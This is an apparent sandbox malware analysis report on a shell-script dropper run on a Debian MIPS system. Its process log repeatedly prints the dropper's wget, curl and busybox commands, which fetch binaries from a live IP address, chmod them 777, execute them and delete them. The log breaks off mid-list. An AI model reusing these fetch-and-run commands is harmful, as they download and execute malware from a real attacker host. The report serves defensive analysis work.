Malware Analysis Report

2025-05-28 20:29

Sample ID 241125-dea9xsvkfw
Target b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
SHA256 b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad

Threat Level: Shows suspicious behavior

The file b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-25 02:54

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-25 02:54

Reported

2024-11-25 02:57

Platform

debian9-mipsel-20240611-en

Max time kernel

92s

Max time network

95s

Command Line

[/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 N/A
N/A /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 N/A
N/A /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs N/A
N/A /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q N/A
N/A /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF N/A
N/A /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB N/A
N/A /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av N/A
N/A /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC N/A
N/A /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL N/A
N/A /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P N/A
N/A /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe N/A
N/A /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy N/A
N/A /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu N/A
N/A /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f N/A
N/A /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 N/A
N/A /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF N/A
N/A /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB N/A
N/A /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av N/A
N/A /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC N/A
N/A /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 N/A
N/A /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs N/A
N/A /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q N/A
N/A /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL N/A
N/A /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu N/A
N/A /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f N/A
N/A /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P N/A
N/A /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe N/A
N/A /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /usr/bin/curl N/A
File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /usr/bin/curl N/A
File opened for modification /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /usr/bin/curl N/A
File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /usr/bin/curl N/A
File opened for modification /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /usr/bin/curl N/A
File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /usr/bin/curl N/A
File opened for modification /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /usr/bin/curl N/A
File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /usr/bin/curl N/A
File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /usr/bin/curl N/A
File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /usr/bin/curl N/A
File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /usr/bin/curl N/A
File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /usr/bin/curl N/A
File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /usr/bin/curl N/A
File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /usr/bin/curl N/A
File opened for modification /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /usr/bin/curl N/A
File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /usr/bin/curl N/A
File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /usr/bin/curl N/A
File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /usr/bin/curl N/A
File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /usr/bin/curl N/A
File opened for modification /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /usr/bin/curl N/A
File opened for modification /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /usr/bin/curl N/A
File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /usr/bin/curl N/A
File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /usr/bin/curl N/A
File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /usr/bin/curl N/A
File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /usr/bin/curl N/A
File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /usr/bin/curl N/A
File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /usr/bin/curl N/A
File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /usr/bin/curl N/A

Processes

/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh

[/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/chmod

[chmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

[./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/rm

[rm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/wget

[wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/chmod

[chmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

[./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/rm

[rm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/wget

[wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/chmod

[chmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs

[./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/rm

[rm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/wget

[wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/chmod

[chmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q

[./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/rm

[rm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/wget

[wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/chmod

[chmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF

[./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/rm

[rm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/wget

[wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/chmod

[chmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB

[./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/rm

[rm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/wget

[wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/chmod

[chmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av

[./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/rm

[rm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/wget

[wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/chmod

[chmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC

[./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/rm

[rm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/wget

[wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/chmod

[chmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL

[./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/rm

[rm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/wget

[wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/chmod

[chmod 777 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P

[./MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/bin/rm

[rm MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P]

/usr/bin/wget

[wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/chmod

[chmod 777 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe

[./6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/bin/rm

[rm 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe]

/usr/bin/wget

[wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/chmod

[chmod 777 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy

[./8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/bin/rm

[rm 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy]

/usr/bin/wget

[wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/chmod

[chmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu

[./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/rm

[rm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/wget

[wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/chmod

[chmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f

[./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/bin/rm

[rm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f]

/usr/bin/wget

[wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/chmod

[chmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59

[./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/bin/rm

[rm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59]

/usr/bin/wget

[wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/chmod

[chmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF

[./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/bin/rm

[rm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF]

/usr/bin/wget

[wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/chmod

[chmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB

[./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/bin/rm

[rm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB]

/usr/bin/wget

[wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/chmod

[chmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av

[./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/bin/rm

[rm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av]

/usr/bin/wget

[wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/chmod

[chmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC

[./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/bin/rm

[rm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC]

/usr/bin/wget

[wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/chmod

[chmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7

[./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/bin/rm

[rm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7]

/usr/bin/wget

[wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/chmod

[chmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs

[./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/bin/rm

[rm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs]

/usr/bin/wget

[wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/chmod

[chmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q

[./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/bin/rm

[rm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q]

/usr/bin/wget

[wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/chmod

[chmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL

[./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/bin/rm

[rm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL]

/usr/bin/wget

[wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/chmod

[chmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu

[./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/bin/rm

[rm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu]

/usr/bin/wget

